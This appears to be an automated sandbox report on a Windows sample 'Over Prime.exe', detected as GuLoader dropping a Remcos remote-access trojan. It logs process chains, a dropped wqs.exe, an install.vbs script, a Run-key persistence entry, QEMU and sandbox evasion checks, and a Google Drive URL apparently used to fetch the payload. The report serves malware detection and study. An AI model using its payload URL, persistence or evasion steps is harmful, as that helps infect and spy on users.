Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C304CC	0_2_02C304CC
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30483	0_2_02C30483
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30451	0_2_02C30451
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30435	0_2_02C30435
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C305D3	0_2_02C305D3
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C305B4	0_2_02C305B4
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30547	0_2_02C30547
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30507	0_2_02C30507
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0167097A	3_2_0167097A
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016720CB	3_2_016720CB
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666967	3_2_01666967
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666977	3_2_01666977
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166697F	3_2_0166697F
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016731C6	3_2_016731C6
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666987	3_2_01666987
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166518E	3_2_0166518E
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166606B	3_2_0166606B
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666073	3_2_01666073
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166607B	3_2_0166607B
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166605B	3_2_0166605B
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666827	3_2_01666827
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166682F	3_2_0166682F
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666807	3_2_01666807
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166680F	3_2_0166680F
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666817	3_2_01666817
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166681F	3_2_0166681F
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668C7	3_2_016668C7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668CF	3_2_016668CF
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668D7	3_2_016668D7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668DF	3_2_016668DF
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668A7	3_2_016668A7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668AF	3_2_016668AF
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668B7	3_2_016668B7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016668BF	3_2_016668BF
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166A896	3_2_0166A896
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666A2B	3_2_01666A2B
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666A33	3_2_01666A33
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666A3B	3_2_01666A3B
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666A13	3_2_01666A13
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666A1B	3_2_01666A1B
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166554A	3_2_0166554A
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016655CB	3_2_016655CB
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01662F36	3_2_01662F36
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01665FB5	3_2_01665FB5
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01666781	3_2_01666781
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01672EEF	3_2_01672EEF
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_0040755C	11_2_0040755C
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_00406D85	11_2_00406D85
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_6C771BFF	11_2_6C771BFF
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 20_2_0040755C	20_2_0040755C
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 20_2_00406D85	20_2_00406D85

Source: C:\Users\user\AppData\Roaming\wqs.exe

Code function: String function: 00402DA6 appears 52 times

Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C46A48 NtResumeThread,	0_2_02C46A48
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C44228 LoadLibraryA,NtAllocateVirtualMemory,	0_2_02C44228
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C463FE NtProtectVirtualMemory,	0_2_02C463FE
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166505D NtProtectVirtualMemory,	3_2_0166505D
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016720CB LoadLibraryA,NtAllocateVirtualMemory,	3_2_016720CB
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016742A1 NtProtectVirtualMemory,	3_2_016742A1
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016650BB NtProtectVirtualMemory,	3_2_016650BB

Source: Over Prime.exe, 00000003.00000002.1007991631.000000001D440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs Over Prime.exe
Source: Over Prime.exe, 00000003.00000002.1007991631.000000001D440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs Over Prime.exe

Source: Over Prime.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wqs.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Over Prime.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: fossildelta.dll.0.dr

Static PE information: Number of sections : 19 > 10

Source: Over Prime.exe	Virustotal: Detection: 11%
Source: Over Prime.exe	ReversingLabs: Detection: 12%

Source: C:\Users\user\Desktop\Over Prime.exe

File read: C:\Users\user\Desktop\Over Prime.exe

Jump to behavior

Source: Over Prime.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Over Prime.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Over Prime.exe "C:\Users\user\Desktop\Over Prime.exe"
Source: C:\Users\user\Desktop\Over Prime.exe	Process created: C:\Users\user\Desktop\Over Prime.exe "C:\Users\user\Desktop\Over Prime.exe"
Source: C:\Users\user\Desktop\Over Prime.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\wqs.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\wqs.exe C:\Users\user\AppData\Roaming\wqs.exe
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 1028
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wqs.exe "C:\Users\user\AppData\Roaming\wqs.exe"
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process created: C:\Users\user\AppData\Roaming\wqs.exe "C:\Users\user\AppData\Roaming\wqs.exe"
Source: C:\Users\user\Desktop\Over Prime.exe	Process created: C:\Users\user\Desktop\Over Prime.exe "C:\Users\user\Desktop\Over Prime.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\wqs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\wqs.exe C:\Users\user\AppData\Roaming\wqs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process created: C:\Users\user\AppData\Roaming\wqs.exe "C:\Users\user\AppData\Roaming\wqs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040352D
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	11_2_0040352D
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 20_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	20_2_0040352D

Source: C:\Users\user\Desktop\Over Prime.exe

File created: C:\Users\user\AppData\Roaming\wqs.exe

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe

File created: C:\Users\user\AppData\Local\Temp\nsd3AF.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/16@3/3

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\Over Prime.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040498A

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Users\user\AppData\Roaming\wqs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Remcos-G5O10D
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:304:WilStaging_02
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1752

Source: C:\Users\user\Desktop\Over Prime.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Over Prime.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: mshtml.pdb source: Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: mshtml.pdbUGP source: Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000003.00000000.827206659.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.1311290809.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1500240670.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_73B930C0 push eax; ret	0_2_73B930EE
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3498C push 09CCB60Ch; ret	0_2_02C34CA7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C322E4 push esi; iretd	0_2_02C32225
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C32280 push esi; iretd	0_2_02C32225
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C39280 push cs; iretd	0_2_02C39228
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3921A push cs; iretd	0_2_02C39228
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C32BD9 push ss; ret	0_2_02C32CA6
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C388DE push ss; iretd	0_2_02C3CE50
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C4504C push ss; iretd	0_2_02C3CE50
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3704E push edx; iretd	0_2_02C3704F
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3600F push ebx; iretd	0_2_02C36044
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C376A7 push ss; iretd	0_2_02C3CE50
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3CE01 push ss; iretd	0_2_02C3CE50
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C42FC6 push ss; iretd	0_2_02C3CE50
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3270E push ebx; retf	0_2_02C3270F
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C34C5B push 09CCB60Ch; ret	0_2_02C34CA7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C395B0 push eax; ret	0_2_02C39552
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C335BA push 0000001Ch; retf	0_2_02C335F5
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C39526 push eax; ret	0_2_02C39552
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166282F push 09CCB60Ch; ret	3_2_01662B4A
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01660123 push esi; iretd	3_2_016600C8
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01667123 push cs; iretd	3_2_016670CB
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01660187 push esi; iretd	3_2_016600C8
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016670BD push cs; iretd	3_2_016670CB
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166A896 push ss; iretd	3_2_0166ACF3
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016673C9 push eax; ret	3_2_016673F5
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01660A7C push ss; ret	3_2_01660B49
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01662AFE push 09CCB60Ch; ret	3_2_01662B4A
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166E2AF push esp; retf	3_2_0166F7B9
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166554A push ss; iretd	3_2_0166ACF3
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016605B1 push ebx; retf	3_2_016605B2

Source: fossildelta.dll.0.dr	Static PE information: section name: .xdata
Source: fossildelta.dll.0.dr	Static PE information: section name: /4
Source: fossildelta.dll.0.dr	Static PE information: section name: /19
Source: fossildelta.dll.0.dr	Static PE information: section name: /31
Source: fossildelta.dll.0.dr	Static PE information: section name: /45
Source: fossildelta.dll.0.dr	Static PE information: section name: /57
Source: fossildelta.dll.0.dr	Static PE information: section name: /70
Source: fossildelta.dll.0.dr	Static PE information: section name: /81
Source: fossildelta.dll.0.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_73B91BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73B91BFF

Source: C:\Users\user\Desktop\Over Prime.exe	File created: C:\Users\user\AppData\Roaming\wqs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wqs.exe	File created: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Over Prime.exe	File created: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Over Prime.exe	File created: C:\Users\user\AppData\Local\Temp\fossildelta.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wqs.exe	File created: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Over Prime.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ws			Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ws			Jump to behavior

Source: C:\Users\user\AppData\Roaming\wqs.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\Over Prime.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Over Prime.exe, 00000000.00000002.979153993.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1500676497.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: Over Prime.exe, 00000000.00000002.979153993.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.978427777.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1500676497.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Over Prime.exe, 00000003.00000002.978427777.0000000003311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1RTDVNE0SII78EB9WV1IWWAGXZ7RS5MJX

Source: C:\Users\user\AppData\Roaming\wqs.exe TID: 6928	Thread sleep count: 598 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe TID: 6928	Thread sleep time: -299000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\wqs.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Over Prime.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fossildelta.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_02C30AF1 rdtsc

0_2_02C30AF1

Source: C:\Users\user\AppData\Roaming\wqs.exe

Window / User API: threadDelayed 598

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Roaming\wqs.exe	API coverage: 2.9 %

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

